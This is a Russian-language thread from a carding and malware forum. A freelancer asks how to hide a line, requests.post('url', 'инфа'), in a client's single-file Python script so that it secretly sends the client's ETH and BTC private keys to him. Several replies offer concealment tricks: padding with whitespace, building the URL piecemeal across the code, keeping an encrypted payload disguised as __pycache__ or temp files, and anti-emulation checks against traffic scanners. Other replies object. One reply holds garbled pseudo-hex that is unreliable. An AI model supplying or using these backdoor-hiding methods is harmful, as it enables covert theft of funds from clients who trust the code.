• XSS.stack #1 – первый литературный журнал от юзеров форума

Как спрятать бэкдор в питон скрипте?

Отслеживать

stdusr

floppy-диск
Пользователь
Регистрация
27.01.2019
Сообщения
8
Реакции
1
Здравствуйте,
иногда занимаюсь фрилансом, получил заказ написать скрипт, который обработает очень вкусную инфу(приватные ключи ETH и BTC). Но т.к. заказчик мне не родственник, ни друг и из недружественной страны, я очень хотел бы, что скрипт отправил эту инфу мне. Заказчик тоже не дурак, он требует, что скрипт был только из одного файла, без каких либо внешних библиотек. В принципе мне надо как то спрятать в скрипте одну строку:
Python: 
requests.post('url', 'инфа')
Если я пошифрую эту строку кода и пробую такие варианты, как:
Python: 
eval('пошифрованный код')
или
exec('пошифрованный код')
то сразу создает подозрение. Может у кого есть другие идеи? Какие нибудь хитрости с юникодом? За дельный совет, и если он прокатит, обещаю 10% от выхлопа. Гарантий, конечно немогу дать, просто честное слово :)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Никак, любой человек который видел синтаксис пару раз (грубо говоря), задастся вопросом что делают твои лишние строки.
А учитывая что ты там скрипт для валют пишешь, проверка будет.
 
Если код небольшой, то довольно сложно что-то сделать. Как вариант, запутать код и сделать его вырвиглазным, но в сторону сложности и длины.
Одной строки будет маловато. Если чел не глупый, он проверит скрипт на отстук как минимум сканерами трафика, поэтому желательно подстраховаться и сделать примитивный антиэмуль, например с таймером и исключением, если процесс известного тебе сканера запущен.
Я бы понадеялся на некомпетентность пользователя и социальную инжерению. Но тут без каких либо гарантий. Я бы попробовал создать или запустить другой питон скрипт хранящийся в зашифрованном виде, возможно кусками и расшифровывать его сразу в консоль(если это возможно) или просто расшифровывать и запускать. Все это можно замаскировать как __pycache__ или временные файлы в темпе. Можно так же для маскировки использовать это и как буфер для основной функции скрипта и пытаться обосновать это пользователю быстродействием(ха-ха). В общем, социальная инженерия и только она, родная.
 
stdusr сказал(а):
Да, наверно только это.
На питоне можно весь код в одну строчку захерачить, это самый лучший человеческий обфускатор ))
Не забывай что твой юрл могут перехватить любым снифером и по балде дать
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Добавь к одной из строк точку с запятой и 100500 пробелов, потом добавь за пробелами твой код в одну строку, но надо иметь ввиду, что блоки кода таким образом не спрячешь, разве что засунуть их в eval. Но и да, я канеш крысятничество не поддерживаю, а осуждаю.
 
DildoFagins сказал(а):
Добавь к одной из строк точку с запятой и 100500 пробелов, потом добавь за пробелами твой код в одну строку, но надо иметь ввиду, что блоки кода таким образом не спрячешь, разве что засунуть их в eval. Но и да, я канеш крысятничество не поддерживаю, а осуждаю.
Думал об этом, но скорее всего, скроллбары испортят все дело.
 
Xk-ar сказал(а):
На питоне можно весь код в одну строчку захерачить, это самый лучший человеческий обфускатор ))
Не забывай что твой юрл могут перехватить любым снифером и по балде дать
Если бы мне такой скрипт передал фрилансер, я бы его нахуй послал сразу же.

Одно могу сказать - такие крысы и очень недалекие люди всегда сидят без денег. Просто мышление нищеброда.
 
Про крысятничество. Странно, форум завален инфой про CC, кардинг, малварь и т.д. Многие работают по самим черным темам. А если я поделюсь (уже) пизженными ключями с каким то арабом, почему это уже крысятничество? :)
 
stdusr сказал(а):
Про крысятничество. Странно, форум завален инфой про CC, кардинг, малварь и т.д. Многие работают по самим черным темам. А если я поделюсь (уже) пизженными ключями с каким то арабом, почему это уже крысятничество? :)
Ну, тут все дело в собственной морали и принципах.
Кому-то мораль позволяет заниматься подобным, но при этом не мешает иметь принципы не работать по РУ\СНГ например. Не скамить форум, на котором сам сидишь и тд. Как выразился чел сверху: "не срать там, где ешь".
Ты фрилансер и брался за работу как фрилансер, если у тебя потом появляются мысли "наипать клиента" - то это не очень хорошо говорит за тебя. Если бы ты изначально имел цель бэкдорить свой продукт для заражения компаний-клиентов, для последующей раскрутки - тут другое дело.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Поп-Хлоп сказал(а):
Автор знатно троллит :D
Зато сколько пригоревших жоп, кококо воровать не хорошо. Сами то когда последний раз в церковь ходили? ?
не в том то дело, что хорошо или плохо. Здесь речь о компетентности человека. Если тебе поручили заказ и заплатили, то будь добр, выполни без реверс шелов, бекдоров, без отсутков на левый домен.
Если изначально у ТС была бы ситуация под типу "получил доступ к компу прогера, как мне туда вшить бекдор" - помогли бы.

Но даже если все гладко сделает, то при пропаже бабок с бтс первое подозрение упадет на него. А всякие такие обещалки процент от выхлопа - чистого рода пиздежь. Если например мне откидывали бы те обещанные бабки за бесплатную помощь (а таких людей не мало), то уверен могу тратить спокойно по 5-8k$ ежемесячно
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Eval()0x3B0x200x65x760x610x6C0x280x29
Это все что можно сделать точка с запятой, 0x3B, там еще этот символ пустоты 0x20.
К сожалению мне не удалось написать тебе скрипт, пробухал и проторчал все за пару лет.
Python: 
Eval()0x3B0x200x65x760x610x6C0x280x29
Python: 
Eval()0x3B0x20Beval()
 
Последнее редактирование:
stdusr сказал(а):
получил заказ написать скрипт, который обработает очень вкусную инфу(приватные ключи ETH и BTC)
А что за тз, что именно делает скрипт?
Клиент то может его запускать оффлайн или на виртуалке...
 
stdusr сказал(а):
Здравствуйте,
иногда занимаюсь фрилансом, получил заказ написать скрипт, который обработает очень вкусную инфу(приватные ключи ETH и BTC). Но т.к. заказчик мне не родственник, ни друг и из недружественной страны, я очень хотел бы, что скрипт отправил эту инфу мне. Заказчик тоже не дурак, он требует, что скрипт был только из одного файла, без каких либо внешних библиотек. В принципе мне надо как то спрятать в скрипте одну строку:
Python: 
requests.post('url', 'инфа')
Если я пошифрую эту строку кода и пробую такие варианты, как:
Python: 
eval('пошифрованный код')
или
exec('пошифрованный код')
то сразу создает подозрение. Может у кого есть другие идеи? Какие нибудь хитрости с юникодом? За дельный совет, и если он прокатит, обещаю 10% от выхлопа. Гарантий, конечно немогу дать, просто честное слово :)
Если бы код был большим, а заказчик не шибко программист. То одна из версий могла бы выглядеть так:
Начало кода:
1.код
2. первый элемент списка "h"
3.код
4. добавить в список "t"
5. код
6. добавить в список "t"
...
100. собираешь список в урл
101. код
102. отправка результата по урл
103. код
 
Choko2 сказал(а):
Если бы код был большим, а заказчик не шибко программист. То одна из версий могла бы выглядеть так:
Начало кода:
1.код
2. первый элемент списка "h"
3.код
4. добавить в список "t"
5. код
6. добавить в список "t"
...
100. собираешь список в урл
101. код
102. отправка результата по урл
103. код
Кстати, можно и по либам разбить куски
 
автор говорит, что скрипт по ТЗ должен быть без зависимостей, а сам юзает requests... Хм, ну допустим. Второй момент - что за олени пишут стиллер на питоне? Третий момент - питон не обфусцируется из-за синтаксиса. Максимум в одну строку все перегнать, но любой онлайн-валидатор все выровняет. Юзать .pyc палево и не 100%-ный вариант (байткод можно прочесть даже в блокноте). В общем, это не тот язык, где ты сможешь что-то спрятать, только если заказчик полный лошпета и запускает не глядя.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх